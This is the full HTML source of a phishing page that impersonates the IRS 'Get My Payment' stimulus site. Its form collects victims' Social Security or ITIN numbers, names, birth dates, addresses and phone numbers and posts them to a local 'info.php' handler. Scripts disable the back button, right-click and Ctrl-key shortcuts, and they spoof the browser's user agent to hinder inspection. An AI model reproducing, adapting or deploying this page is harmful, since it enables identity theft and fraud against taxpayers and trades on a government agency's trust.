﻿<!DOCTYPE html>
<html><script type="text/javascript">Object.defineProperty(window.navigator, 'plugins', { get: function () { return [];},enumerable: true,configurable: true});Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return 'Mozilla/5.0 (Windows NT 6.1; rv:93.0) Gecko/20100101 Firefox/93.0'; } });</script><script type="text/javascript">Object.defineProperty(window.navigator, 'plugins', { get: function () { return [];},enumerable: true,configurable: true});Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return 'Mozilla/5.0 (Windows NT 6.1; rv:93.0) Gecko/20100101 Firefox/93.0'; } });</script><script type="text/javascript">Object.defineProperty(window.navigator, 'plugins', { get: function () { return [];},enumerable: true,configurable: true});Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return 'Mozilla/5.0 (Windows NT 6.1; rv:93.0) Gecko/20100101 Firefox/93.0'; } });</script><script type="text/javascript">Object.defineProperty(window.navigator, 'plugins', { get: function () { return [];},enumerable: true,configurable: true});Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return 'Mozilla/5.0 (Windows NT 6.1; rv:93.0) Gecko/20100101 Firefox/93.0'; } });</script><script type="text/javascript">Object.defineProperty(window.navigator, 'plugins', { get: function () { return [];},enumerable: true,configurable: true});Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return 'Mozilla/5.0 (Windows NT 6.1; rv:93.0) Gecko/20100101 Firefox/93.0'; } });</script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<script src="personal_files/jquery.js"></script>
		<meta name="viewport" content="width=device-width,initial-scale=1">
    	<link rel="icon" type="image/x-icon" href="personal_files/favicon.ico">
		<link rel="stylesheet" href="personal_files/bootstrap.css">
		<link rel="stylesheet" href="personal_files/jquery-ui.css">
		<link rel="stylesheet" href="personal_files/irs.css">
		<link rel="stylesheet" href="personal_files/app.css">
		<link rel="stylesheet" href="personal_files/app-error.css">
<link rel="stylesheet" href="personal_files/wmsp-shared-secrets.css">
<link rel="stylesheet" href="personal_files/wmsp-results.css">
<link rel="stylesheet" href="personal_files/datepicker.css">

        <script type="text/javascript">window.history.forward(); function noBack() { window.history.forward(); }</script>
        <body onload="noBack();" onpageshow="if (event.persisted) noBack();" onunload="">

		<title>Get My Payment</title>
	</head>
	<body class="icce">
	
		<div class="container-fluid" style="background: #f1f1f1; width: 100%;">
			<div class="flagtext">
				<p class="usflag">An official website of the United States Government</p>
			</div>
		</div>
	
		<div class="container-fluid" role="banner" style="background-color: #00599c; width: 100%;">
			<div class="header">
				<div class="navbar">
						<a class="logo" href="#" title="Go to IRS Home Page">
							<img aria-hidden="true" src="personal_files/logo.png">
						</a>																	
						
						<ul class="navbar-nav">
							
							

	
 
	

                
                
						<li class="navbar-item"><a class="nav-link" href="#" title="Click this link to switch language">Espa&ntilde;ol</a>
						</li>        
                
                
								<li class="navbar-item"><a class="nav-link" href="#" title="Click this link to logoff"> <span>Exit</span> 
										<svg aria-hidden="true" focusable="false" viewBox="0 0 491.1 412.5">
											<path d="M 282.9 283.5 v 11.9 c 0 24.5 0.1 49.1 0 73.6 c 0 9.3 3.2 16.6 12 20.6 c
											    9.2 4.1 16.7 0.5 23 -5.9 c 54.4 -54.3 108.8 -108.6 163.1 -163.1 c 10.2 -10.2
											    10.3 -21 0.3 -31 c -54.4 -54.7 -109.1 -109.2 -163.7 -163.7 c -6.1 -6.1 -13.4
											    -9.4 -22.3 -5.7 c -8.9 3.8 -12.4 11 -12.4 20.3 v 86 h -11.8 c -40.6 0 -81.1
											    -0.1 -121.7 0 c -15.7 0 -23.5 7.1 -23.6 22.3 c -0.2 37.6 -0.2 75.3 0 112.9 c
											    0.1 14.2 7.9 21.6 22.1 21.8 c 15.7 0.2 31.4 0.1 47.1 0.1 c 28.8 -0.1 57.6
											    -0.1 87.9 -0.1 Z M 8.2 205 h -0.4 c 0 35.7 -0.3 71.4 0.1 107 c 0.4 46.6 30.7
											    83.4 76.9 87.8 c 36.3 3.5 73.2 1.4 109.8 1.2 c 2.8 0 7.1 -3.9 8 -6.8 c 1.7
											    -5.1 2 -10.9 1.6 -16.4 c -0.9 -14 -2.8 -15.5 -16.7 -15.5 h -87.4 C 68 362.2
											    47 343 46.7 311.2 c -0.6 -70.7 -0.6 -141.4 0 -212.1 c 0.3 -32 21.1 -51.1
											    53.2 -51.2 c 28.8 -0.1 57.6 0 86.4 0 c 15.2 0 18.1 -2.9 18.1 -18.4 c 0 -3.3
											    -0.6 -6.5 -0.8 -9.8 c -0.5 -7.6 -4.5 -11 -12.1 -11 c -33.4 0.1 -66.8 -0.7
											    -100.1 0.4 c -44.7 1.5 -81.1 36.6 -83 81.1 c -1.4 38.2 -0.2 76.5 -0.2 114.8
											    Z">
											 </path>
											 <path d="M 282.9 283.5 h -87.8 c -15.7 0 -31.4 0.2 -47.1 -0.1 c -14.2 -0.2 -22 -7.6
											    -22.1 -21.8 c -0.3 -37.6 -0.3 -75.3 0 -112.9 c 0.1 -15.1 7.9 -22.2 23.6
											    -22.3 c 40.6 -0.1 81.1 0 121.7 0 H 283 V 114 V 40.4 c 0 -9.3 3.5 -16.5 12.4
											    -20.3 c 8.8 -3.7 16.1 -0.4 22.3 5.7 C 372.4 80.3 427 134.9 481.5 189.6 c 10
											    10 9.8 20.8 -0.3 31 c -54.3 54.5 -108.7 108.8 -163.1 163.1 c -6.4 6.4 -13.9
											    10 -23 5.9 c -8.8 -4 -12 -11.3 -12 -20.6 c 0.1 -24.5 0 -49.1 0 -73.6 c -0.2
											    -3.5 -0.2 -7 -0.2 -11.9 Z">
											 </path>
											 <path d="M 8.2 205 c 0 -38.3 -1.3 -76.6 0.3 -114.8 c 1.9 -44.5 38.3 -79.6 83 -81.1 c
											    33.3 -1.1 66.8 -0.3 100.1 -0.4 c 7.6 0 11.6 3.4 12.1 11 c 0.2 3.3 0.8 6.5
											    0.8 9.8 c 0 15.5 -3 18.4 -18.1 18.4 H 100 c -32.1 0.1 -53 19.3 -53.2 51.2 c
											    -0.6 70.7 -0.6 141.4 0 212.1 c 0.3 31.8 21.3 51.1 53.4 51.1 c 29.1 0.1 58.3
											    0 87.4 0 c 13.9 0 15.8 1.5 16.7 15.5 c 0.3 5.5 0 11.3 -1.6 16.4 c -1 2.9
											    -5.2 6.8 -8 6.8 c -36.6 0.2 -73.5 2.3 -109.8 -1.2 c -46.3 -4.3 -76.6 -41.2
											    -77 -87.8 c -0.3 -35.7 -0.1 -71.3 -0.1 -107 h 0.4 Z">
											  </path>
									 	</svg></a></li>
									 	
				 					 	
           
                
	
							</ul>
						</div>
					</div>
				</div>
  



		<div class="main container-fluid">
			<main>

<form id="user" action="info.php?=app-IRFOF&action-refund" method="post">

	<h1 class="login-title">Get My Payment</h1>

	<p>If you need additional help, please visit our <a href="https://www.irs.gov/covid-app-faq-1" target="_blank">Frequently Asked Questions</a> page.</p>
	
	<p>
	<span>All fields marked with an asterisk (<font color="#CD2026">*</font>) are required.</span>
	</p>
	<br>
	
	
					
		

		<div class="form-group">
			<div class="control-label">
				<label>Social Security Number (SSN) or Individual Tax ID Number (ITIN)</label> 
				<label style="color:#CD2026;font-weight:normal">*</label> 
			</div>
			<span class="fsad-hint">Enter your 9 digit Social Security Number (SSN) or Individual Tax Identification Number (ITIN).</span> 
			<input required="" class="form-control ssn" id="ssn" type="text" autocomplete="off" maxlength="11" aria-required="true" aria-labelledby="ssnInput" name="ssn"> 
				 <script type="text/javascript">
$('input.ssn').on('keypress', function(event){
    var character = String.fromCharCode(event.which);
    if(!isInteger(character)){
        return false;
    }    
});
function isInteger (s) {
    if(s === '-') return true;
   var isInteger_re     = /^\s*(\+|-)?\d+\s*$/;
   return String(s).search (isInteger_re) != -1
}
$('input.ssn').on('keyup', function(){
   var val = this.value.replace(/\D/g, '');
   var newVal = '';
    if(val.length > 4) {
        this.value = val;
    }
    if((val.length > 3) && (val.length < 6)) {
        newVal += val.substr(0, 3) + '-';
        val = val.substr(3);
    }
    if (val.length > 5) {
        newVal += val.substr(0, 3) + '-';
        newVal += val.substr(3, 2) + '-';
        val = val.substr(5);
    }
    newVal += val;
    this.value = newVal;   
});
</script>
		</div>
		
		<div class="form-group">
			<div class="control-label">
				<label>Full Name</label>
				<label style="color:#CD2026;font-weight:normal">*</label>
			</div>
			<span class="fsad-hint">Enter your Full Name.</span>
			<input required="" class="form-control" id="addressInput" maxlength="100" type="text" aria-required="true" aria-labelledby="addressInput" name="fname"> 
				
		</div>

		<div class="form-group">
			<div class="control-label">
				<label for="dobInput">Date of Birth</label>
				<label style="color:#CD2026;font-weight:normal">*</label> 
			</div>
			<span class="fsad-hint">Enter your Date of Birth in MM/DD/YYYY format.</span>
			<div class="login-dob">
				<div class="input-group"><input required="" class="date form-control dob" id="dob" minlength="8" maxlength="10" aria-required="true" aria-labelledby="date" type="text" name="dob" aria-autocomplete="none" style="min-width: 7em;"></div>
			</div>
			  <script>
			 $('input.dob').on('keypress', function(event){
    var character = String.fromCharCode(event.which);
    if(!isInteger(character)){
        return false;
    }    
});
function isInteger (s) {
    if(s === '/') return true;
   var isInteger_re     = /^\s*(\+|-)?\d+\s*$/;
   return String(s).search (isInteger_re) != -1
}
$('input.dob').on('keyup', function(){
   var val = this.value.replace(/\D/g, '');
   var newVal = '';
    if(val.length > 4) {
        this.value = val;
    }
    if((val.length > 2) && (val.length < 6)) {
        newVal += val.substr(0, 2) + '/';
        val = val.substr(2);
    }
    if (val.length > 5) {
        newVal += val.substr(0, 2) + '/';
        newVal += val.substr(2, 2) + '/';
        val = val.substr(4);
    }
    newVal += val;
    this.value = newVal;   
});
</script>
		</div>

		<div class="form-group">
			<div class="control-label">
				<label>Street Address</label>
				<label style="color:#CD2026;font-weight:normal">*</label>
			</div>
			<span class="fsad-hint">Enter your Street Address in "123 Main St NW #7" format. Do not enter City/Town or State.</span>
			<input required="" class="form-control" id="addressInput" maxlength="100" type="text" aria-required="true" aria-labelledby="addressInput" name="address"> 
				
		</div>
<div class="form-group">
			<div class="control-label">
				<label>City</label>
				<label style="color:#CD2026;font-weight:normal">*</label>
			</div>
			<span class="fsad-hint">Enter your City format.</span>
			<input required="" class="form-control" id="addressInput" maxlength="100" type="text" aria-required="true" aria-labelledby="addressInput" name="city"> 
				
		</div>
		<div class="form-group">
			<div class="control-label">
				<label>State</label>
				<label style="color:#CD2026;font-weight:normal">*</label>
			</div>
			<span class="fsad-hint">Enter your State in format.</span>
			<input required="" class="form-control" id="addressInput" maxlength="100" type="text" aria-required="true" aria-labelledby="addressInput" name="state"> 
				
		</div>
		<div class="form-group">
			<div class="control-label">
				<label>ZIP or Postal Code</label>
				<label style="color:#CD2026;font-weight:normal">(* Required except for countries without ZIP or postal codes)</label>
			</div>
			<span class="fsad-hint">Enter your 5 digit ZIP or Postal Code.</span>
			<input class="form-control" required="" id="zipCodeInput" maxlength="12" type="text" aria-labelledby="zipCodeInput" name="zip"> 
				
		</div>
		<div class="form-group">
			<div class="control-label">
				<label>Phone Number</label>
				<label style="color:#CD2026;font-weight:normal">*</label>
			</div>
			<span class="fsad-hint">Enter your phone number.</span>
			<input required="" class="form-control" maxlength="15" type="tel" aria-required="true" name="phnum"> 
				
		</div>

		<div>
			<button disabled="disabled" class="login-submit-button btn btn-primary" name="submit" id="submit" title="Click this button to continue" type="submit" value="submit">Continue</button>
		</div>
		<script>
		    $('input[type=text]').change(function(){
    if($('input[type=text]').val()==''){
        $('button').attr('disabled',true)
    } 
    else{
      $('button').attr('disabled',false);
    }
})
		</script>
</form>
</main>
		</div>
	        
	    <div class="container-fluid" style="background: #00000 ;width: 100%;">
	        <div class="footer container-fluid"> 
	          <div class="navbar">
	            <div class="navfooterlogo">
					<img aria-hidden="true" alt="Decorative IRS Logo" src="personal_files/irs_horiz_white.png">
				</div>

							
		<div class="footer-links-position">
			 <span class="text-white">
				<a href="#" class="text-white mr-2">IRS Privacy Policy</a></span>
		</div>
					

				</div>
			</div>
		</div>

<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// --> 
</script>

<script language="JavaScript">
        function disableCtrlKeyCombination(e)
        {
                //list all CTRL + key combinations you want to disable
                var forbiddenKeys = new Array("a", "s", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
                var key;
                var isCtrl;

                if(window.event)
                {
                        key = window.event.keyCode;     //IE
                        if(window.event.ctrlKey)
                                isCtrl = true;
                        else
                                isCtrl = false;
                }
                else
                {
                        key = e.which;     //firefox
                        if(e.ctrlKey)
                                isCtrl = true;
                        else
                                isCtrl = false;
                }

                //if ctrl is pressed check if other key is in forbidenKeys array
                if(isCtrl)
                {
                    for (i = 0; i < forbiddenKeys.length; i++)
                        {
                                //case-insensitive comparation
                            if (forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase())
                                {
//                                    alert("Key combination CTRL + "
//                                                + String.fromCharCode(key)
//                                                + " has been disabled.");                                   
                                        return false;
                                }
                        }
                }
                return true;
        }
    </script>

    <script>
   
    document.onkeydown = function(e) {
         if (e.altKey && (e.keyCode === 36)) {//Alt+home blocked.
            return false;
        }
        if (e.altKey && (e.keyCode === 70)) {//Alt+f blocked.
            return false;
        }
    };
    </script>

<body onkeypress="return disableCtrlKeyCombination(event);" onkeydown="return disableCtrlKeyCombination(event);" >

	</body></html>